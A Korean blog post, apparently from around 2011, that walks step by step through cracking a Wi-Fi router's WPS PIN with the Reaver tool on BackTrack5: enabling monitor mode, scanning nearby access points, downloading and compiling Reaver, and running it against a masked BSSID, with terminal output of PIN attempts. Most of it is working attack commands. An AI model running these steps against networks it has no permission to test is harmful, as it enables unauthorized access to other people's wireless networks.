[BackTrack5] WPS Crack (WPA/WPA2) - Reaver brute force attack tool v1.3

WPA/WPA2 PIN 평문을 얻어내는 도구가 공개되었습니다.

(기사)http://threatpost.com/en_us/blogs/attack-tool-released-wps-pin-vulnerability-122911
(blog) http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html
(code) https://code.google.com/p/reaver-wps/downloads/list

벌써 1.3 버전까지 개발이 된 것 같은데요. 문서에 따르면 적게는 4시간, 많게는 10시간 정도의 시간이 소요되며, 신뢰성은 약 95%를 보장한다고 합니다. 호기심이 발동하여 테스트 해봤습니다.

테스트는 BackTrack5 환경으로 구성했습니다.

Step1) 무선랜 드라이버 환경 좀 살펴보구요..

root@bt:~# iwconfig lo        no wireless extensions. eth1      no wireless extensions. wlan0  IEEE 802.11bgn  ESSID:off/any            Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm             Retry  long limit:7   RTS thr:off   Fragment thr:off           Encryption key:off           Power Management:on

Step2) 모니터 모드를 설정하구요...

root@bt:~# airmon-ng start wlan0 Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID    Name 1293    dhclient3 1754    dhclient3 Process with PID 1754 (dhclient3) is running on interface wlan0 Process with PID 3881 (reaver) is running on interface mon0 Interface    Chipset        Driver wlan0        Ralink RT2870/3070    rt2800usb - [phy0]                 (monitor mode enabled on mon0)

Step3) 주위 무선 AP를 스캔해보구요...

root@bt:~# iwlist wlan0 scanning ............... Cell 12 - Address: XX:XX:XX:XX:XX:XX  <- MAC                     Channel:8                     Frequency:2.447 GHz (Channel 8)                     Quality=70/70  Signal level=26 dBm                     Encryption key:on                     ESSID:"XXXXXXXXXXXX"                     Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s                               9 Mb/s; 12 Mb/s; 18 Mb/s                     Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s                     Mode:Master ...............               (보기 불편하면 airodump-ng를 사용해도 무리 없겠죠) root@bt:~# airodump-ng mon0 BSSID                       PWR  Beacons #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                           XX:XX:XX:XX:XX:XX   -82        1          0         0   1     54e  WPA2 CCMP   PSK  XXXXXXXXXXXX

Step4) Reaver tool 다운로드 및 설치를 하구요(컴파일 해야 합니다)

root@bt:~# wget https://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz root@bt:~# tar -zxvf reaver-1.3.tar.gz root@bt:~# (src) 디렉토리 이동 root@bt:~# ./configure root@bt:~# make root@bt:~# make install (참고로 libpca-devel, sqlite-devel 패키지가 설치되어 있어야 하는데 다행히? Backtrack5에는 기본적으로 모두 설치 되어 있더군요. 정말 편리합니다~)

Step5) Reaver 실행!

root@bt:~#./reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv                                                            (timeout lock 무시하고 싶을때 -L 옵션 추가) Reaver v1.3 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Restored previous session [+] Waiting for beacon from 00:07:7D:14:63:1B [+] Switching mon0 to channel 2 [+] Switching mon0 to channel 3 [+] Switching mon0 to channel 4 [+] Switching mon0 to channel 5 [+] Switching mon0 to channel 6 [+] Switching mon0 to channel 7 [+] Switching mon0 to channel 8 [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXXXXXXXXXX) [+] Trying pin 02042688 .......... 이렇게 나온답니다.